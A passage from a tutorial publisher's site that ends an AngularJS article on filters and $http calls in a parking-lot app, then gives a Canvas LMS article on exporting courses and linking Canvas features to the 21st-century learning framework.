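// Injecting $filter lets us invoke any filter from JavaScript code
parking.controller("reportCtrl", function ($scope, $filter) {
  // Equivalent to {{ 10 | currency }} in a template
  $scope.price = $filter("currency")(10);
});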
Besides the currency, the locale also defines the configuration of many other elements, such as the days of the week and the months, which is very useful when combined with the next filter, used to format dates.

date

The date filter is one of the most useful filters of the framework. Generally, a date value comes from the database or any other source in a raw and generic format. Because of that, filters like this one are essential to any kind of application. Basically, we can use this filter by declaring it inside any expression. In the following example, we use the filter on a date variable attached to the scope:

{{ car.entrance | date }}

The output will be Dec 10, 2013. However, there are thousands of combinations that we can make with the optional format mask:

{{ car.entrance | date:'MMMM dd/MM/yyyy HH:mm:ss' }}

Using this format, the output changes to December 10/12/2013 21:42:10.

filter

Have you ever needed to filter a list of data? This filter performs exactly this task, acting over an array and applying any filtering criteria. Now, let's include in our car parking application a field to search for any parked car, and use this filter to do the job:

index.html

<input type="text" ng-model="criteria" placeholder="What are you looking for?" />
<table>
  <thead>
    <tr>
      <th></th>
      <th>Plate</th>
      <th>Color</th>
      <th>Entrance</th>
    </tr>
  </thead>
  <tbody>
    <tr ng-class="{selected: car.selected}" ng-repeat="car in cars | filter:criteria">
      <td><input type="checkbox" ng-model="car.selected" /></td>
      <td>{{car.plate}}</td>
      <td>{{car.color}}</td>
      <td>{{car.entrance | date:'dd/MM/yyyy hh:mm'}}</td>
    </tr>
  </tbody>
</table>

The result is really impressive: with just an input field and the filter declaration, we did the job.

Integrating the backend with AJAX

AJAX, also known as Asynchronous JavaScript and XML, is a technology that allows applications to send and retrieve data from the server asynchronously, without refreshing the page. The $http service wraps the low-level interaction with the XMLHttpRequest object, providing an easy way to perform calls. This service can be called by just passing a configuration object, which is used to set many important options such as the method, the URL of the requested resource, the data to be sent, and many others:

$http({method: "GET", url: "/resource"})
  .success(function (data, status, headers, config, statusText) {
  })
  .error(function (data, status, headers, config, statusText) {
  });

To make the service easier to use, the following shortcut methods are available. In this case, the configuration object is optional:

$http.get(url, [config])
$http.post(url, data, [config])
$http.put(url, data, [config])
$http.head(url, [config])
$http.delete(url, [config])
$http.jsonp(url, [config])

Now, it's time to integrate our parking application with the backend by calling the cars resource with the GET method. It will retrieve the cars, binding them to the $scope object. In case something goes wrong, we are going to log it to the console:

controllers.js

parking.controller("parkingCtrl", function ($scope, $http) {
  $scope.appTitle = "[Packt] Parking";
  $scope.park = function (car) {
    car.entrance = new Date();
    $scope.cars.push(car);
    delete $scope.car;
  };
  var retrieveCars = function () {
    $http.get("/cars")
      .success(function (data, status, headers, config) {
        $scope.cars = data;
      })
      .error(function (data, status, headers, config) {
        switch (status) {
          case 401: {
            $scope.message = "You must be authenticated!";
            break;
          }
          case 500: {
            $scope.message = "Something went wrong!";
            break;
          }
        }
        console.log(data, status);
      });
  };
  retrieveCars();
});
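The same service can also persist data. As a sketch only, and assuming the backend accepts POST requests on the /cars resource (an assumption on our part, since only the GET call is shown here), the park function in the controller above could send the new car to the server and update the local array once the call succeeds:

controllers.js (sketch)

$scope.park = function (car) {
  car.entrance = new Date();
  // POST the new car to the assumed /cars resource
  $http.post("/cars", car)
    .success(function (data, status, headers, config) {
      // only update the view's model after the server confirms
      $scope.cars.push(car);
      delete $scope.car;
    })
    .error(function (data, status, headers, config) {
      $scope.message = "The car could not be parked!";
    });
};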
Summary

This article introduced you to the fundamentals of AngularJS in order to design and construct reusable, maintainable, and modular web applications.

Resources for Article:

Further resources on this subject:

AngularJS Project [article]
Working with Live Data and AngularJS [article]
CreateJS – Performing Animation and Transforming Function [article]
Now You're Ready!

Packt
20 Aug 2014
14 min read
In this article by Ryan John, author of the book Canvas LMS Course Design, we will have a look at the key points encountered during the course-building process, along with connections to educational philosophies and practices that support technology as a powerful way to enhance teaching and learning. As you finish teaching your course, you will be well served to export your course to keep as a backup, to upload and reteach later within Canvas to a new group of students, or to import into another LMS. After covering how to export your course, we will tie everything we've learned together through a discussion of how Canvas can help you and your students achieve educational goals while acquiring important 21st century skills. Overall, we will cover the following topics:

- Exporting your course from Canvas to your computer
- Connecting Canvas to education in the 21st century

Exporting your course

Now that your course is complete, you will want to export the course from Canvas to your computer. When you export your course, Canvas compiles all the information from your course and allows you to download a single file to your computer. This file will contain all of the information for your course, and you can use this file as a master template for each time you or your colleagues teach the course. Exporting your course is helpful for two main reasons:

- It is wise to save a backup version of your course on a computer. After all the hard work you have put into building and teaching your course, it is always a good decision to export your course and save it to a computer. If you are using a Free for Teachers account, your course will remain intact and accessible online until you choose to delete it. However, if you use Canvas through your institution, each institution has different procedures and policies in place regarding what happens to courses when they are complete. Exporting and saving your course will preserve your hard work and protect it from any accidental or unintended deletion.
- Once you have exported your course, you will be able to import your course into Canvas at any point in the future. You are also able to import your course into other LMSs such as Moodle or Blackboard. You might wish to import your course back into Canvas if your course is removed from your institution-specific Canvas account upon completion, so that you have a copy of the course to import the next time you are scheduled to teach it. You might also build and teach a course using a Free for Teachers account, and then later wish to import that version of the course into an institution-specific Canvas account or another LMS.

Exporting your course does not remove the course from Canvas; your course will still be accessible on the Canvas site unless it is automatically deleted by your institution or you choose to delete it. To export your entire course, complete the following steps:

1. Click on the Settings tab at the bottom of the left-hand side menu, as pictured in the following screenshot.
2. On the Settings page, look to the right-hand side menu and click on the Export Course Content button, which is highlighted in the following screenshot.
3. A screen will appear asking you whether you would like to export the Course or export a Quiz. To export your entire course, select the Course option and then click on Create Export, as shown in the following screenshot.
4. Once you click on Create Export, a progress bar will appear.
As indicated in the message below the progress bar, the export might take a while to complete, and you can leave the page while Canvas exports the content. The following screenshot displays this progress bar and message.

5. When the export is complete, you will receive an e-mail from [email protected] that resembles the following screenshot. Click on the Click to view exports link in the e-mail.
6. A new window or tab will appear in your browser that shows your Content Exports. Below the heading of the page, you will see your course export listed with a link that reads Click here to download, as pictured in the following screenshot. Go ahead and click on the link, and the course export file will be downloaded to your computer.

Your course export file will be downloaded to your computer as a single .imscc file. You can then move the downloaded file to a folder on your computer's hard drive for later access. Your course export is complete, and you can save the exported file for later use. To access the content stored in the exported .imscc file, you will need to import the file back into Canvas or another LMS.

You might notice an option to Conclude this Course on the course Settings page if your institution has not hidden or disabled this option. In most cases, it is not necessary to conclude your course if you have set the correct course start and end dates in your Course Details. Concluding your course prevents you from altering grades or accessing course content, and you cannot unconclude your course on your own. Some institutions conclude courses automatically, which is why it is always best to export your course to preserve your work.

Now that we have covered the last how-to aspects of Canvas, let's close with some ways to apply the skills we have learned in this book to contemporary educational practices, philosophies, and requirements that you might encounter in your teaching.

Connecting Canvas to education in the 21st century

While learning how to use the features of Canvas, it is easy to forget the main purpose of Canvas' existence: to better serve your students and you in the process of education. In the midst of rapidly evolving technology, students and teachers alike require skills that are as adaptable and fluid as the technologies and new ideas swirling around them. While the development of various technologies might seem daunting, those involved in education in the 21st century have access to new and exciting tools that have never existed before. As an educator seeking to refine your craft, utilizing tools such as Canvas can help you and your students develop the skills that are becoming increasingly necessary to live and thrive in the 21st century. As attainment of these skills has proven more and more valuable in recent years, many educational systems have begun to require evidence that instructors are cognizant of these skills and actively working to ensure that students are reaching valuable goals.

Enacting the Framework for 21st Century Learning

As education across the world continues to evolve, the development of frameworks, methods, and philosophies of teaching has shaped the world of formal education. In recent years, one such approach that has gained prominence in the United States' education systems is the Framework for 21st Century Learning, which was developed over the last decade through the work of the Partnership for 21st Century Skills (P21).
This partnership between education, business, community, and government leaders was founded to help educators provide children in Kindergarten through 12th Grade (K-12) with the skills they would need going forward into the 21st century. Though the focus of P21 is on children in grades K-12, the concepts and knowledge articulated in the Framework for 21st Century Learning are valuable for learners at all levels, including those in higher education. In the following sections, we will apply our knowledge of Canvas to the desired 21st century student outcomes, as articulated in the P21 Framework for 21st Century Learning, to brainstorm the ways in which Canvas can help prepare your students for the future.

Core subjects and 21st century themes

The Framework for 21st Century Learning describes the importance of learning certain core subjects, including English, reading or language arts, world languages, the arts, Mathematics, Economics, Science, Geography, History, Government, and Civics. In connecting these core subjects to the use of Canvas, the features of Canvas and the tips throughout this book should enable you to successfully teach courses in any of these subjects. In tandem with teaching and learning within the core subjects, P21 also advocates for schools to "promote understanding of academic content at much higher levels by weaving 21st century interdisciplinary themes into core subjects." The following examples offer insight and ideas for ways in which Canvas can help you integrate these interdisciplinary themes into your course. As you read through the following suggestions and ideas, think about strategies that you might be able to implement into your existing curriculum to enhance its effectiveness and help your students engage with the P21 skills:

- Global awareness: Since it is accessible from anywhere with an Internet connection, Canvas opens the opportunity for a myriad of interactions across the globe. Utilizing Canvas as the platform for a purely online course enables students from around the world to enroll in your course. As a distance-learning tool in colleges, universities, or continuing education departments, Canvas has the capacity to unite students from anywhere in the world to directly interact with one another:
  - You might utilize the graded discussion feature for students to post a reflection about a class reading that considers their personal cultural background and how that affects their perception of the content. Taking it a step further, you might require students to post a reply comment on other students' reflections to further spark discussion, collaboration, and cross-cultural connections. As a reminder, it is always best to include an overview of online discussion etiquette somewhere within your course; you might consider adding a "Netiquette" section to your syllabus to maintain focus and a professional tone within these discussions.
  - You might set up a conference through Canvas with an international colleague as a guest lecturer for a course in any subject. As a prerequisite assignment, you might ask students to prepare three questions to ask the guest lecturer to facilitate a real-time international discussion within your class.
- Financial, economic, business, and entrepreneurial literacy: As the world becomes increasingly digitized, accessing and incorporating current content from the Web is a great way to incorporate financial, economic, business, and entrepreneurial literacy into your course:
  - In a Math course, you might consider creating a course module centered around the stock market. Within the module, you could build custom content pages offering direct instruction and introductions to specific topics. You could upload course readings and embed videos of interviews with experts using the YouTube app. You could link to live stream websites tracking the movement of the markets and create quizzes to assess students' understanding.
- Civic literacy: In fostering students' understanding of their role within their communities, Canvas can serve as a conduit of information regarding civic responsibilities, procedures, and actions:
  - You might create a discussion assignment in which students search the Internet for a news article about a current event and post a reflection with connections to other content covered in the course. Offering guidance in your instructions to address how local and national citizenship impacts students' engagement with the event or incident could deepen the nature of the responses you receive. Since discussion posts are visible to all participants in your course, a follow-up assignment might be for students to read one of the articles posted by another student and critique or respond to their reflection.
- Health literacy: Canvas can allow you to facilitate the exploration of health and wellness through the wide array of submission options for assignments. By utilizing the variety of assignment types you can create within Canvas, students are able to explore course content in new and meaningful ways:
  - In a studio art class, you can create an out-of-class assignment to be submitted to Canvas in which students research the history, nature, and benefits of art therapy online and then create and upload a video sharing their personal relationship with art and connecting it to what they have found in the art therapy stories of others.
- Environmental literacy: As a cloud-based LMS, Canvas allows you to share files and course content with your students while maintaining and fostering an awareness of environmental sustainability:
  - In any course you teach that involves readings uploaded to Canvas, encourage your students to download the readings to their computers or mobile devices rather than printing the content onto paper. Downloading documents to read on a device instead of printing them saves paper, reduces waste, and helps foster sustainable environmental habits.
  - For PDF files embedded into content pages on Canvas, students can click on the preview icon that appears next to the document link and read the file directly on the content page without downloading or printing anything.
  - Make a conscious effort to mention or address the environmental impacts of online learning versus traditional classroom settings, perhaps during a synchronous class conference or on a discussion board.

Learning and innovation skills

A number of specific elements, combined, can enable students to develop the learning and innovation skills that prepare them for the increasingly "complex life and work environments in the 21st century."
The communication setup of Canvas allows for quick and direct interactions while offering students the opportunity to contemplate and revise their contributions before posting to the course, submitting an assignment, or interacting with other students. This flexibility, combined with the ways in which you design your assignments, can help incorporate the following elements into your course to ensure the development of learning and innovation skills:

- Creativity and innovation: There are many ways in which the features of Canvas can help your students develop their creativity and innovation. As you build your course, finding ways for students to think creatively, work creatively with others, and implement innovations can guide the creation of your course assignments:
  - You might consider assigning groups of students to assemble a content page within Canvas dedicated to a chosen or assigned topic. Do so by creating a content page and then enabling any user within the course to edit the page. Allowing students to experiment with the capabilities of the Rich Content Editor, embedding outside content, and synthesizing ideas within Canvas allows each group's creativity to shine.
  - As a follow-up assignment, you might choose to have students transfer the content of their content page to a public website or blog using sites such as Wikispaces, Wix, or Weebly. Once the sites are created, students can post their group site to a Canvas discussion page, where other students can view and interact with the work of their peers. Asking students to disseminate the class sites to friends or family around the globe could create international connections stemming from the creativity and innovation of your students' web content.
- Critical thinking and problem solving: As your students learn to overcome obstacles and find multiple solutions to complex problems, Canvas offers a place for students to work together to develop their critical thinking and problem-solving skills:
  - Assign pairs of students to debate and posit solutions to a global issue that connects to topics within your course. Ask students to use the Conversations feature of Canvas to debate the issue privately, finding supporting evidence in various forms from around the Internet. Using the Collaborations feature, ask each pair of students to assemble and submit a final e-report on the topic, presenting the various solutions they came up with as well as supporting evidence in various electronic forms such as articles, videos, news clips, and websites.
- Communication and collaboration: With the seemingly impersonal nature of electronic communication, communication skills are incredibly important to maintain intended meanings across multiple means of communication. As the nature of online collaboration and communication poses challenges for understanding, connotation, and meaning, honing communication skills becomes increasingly important:
  - As a follow-up assignment to the preceding debate suggestion, use the conferences tool in Canvas to set up a full class debate. During the debate, ask each pair of students to present their final e-report to the class, followed by a group discussion of each pair's findings, solutions, and conclusions. You might find it useful for each pair to explain their process and describe the challenges and/or benefits of collaborating and communicating via the Internet, in contrast to collaborating and communicating in person.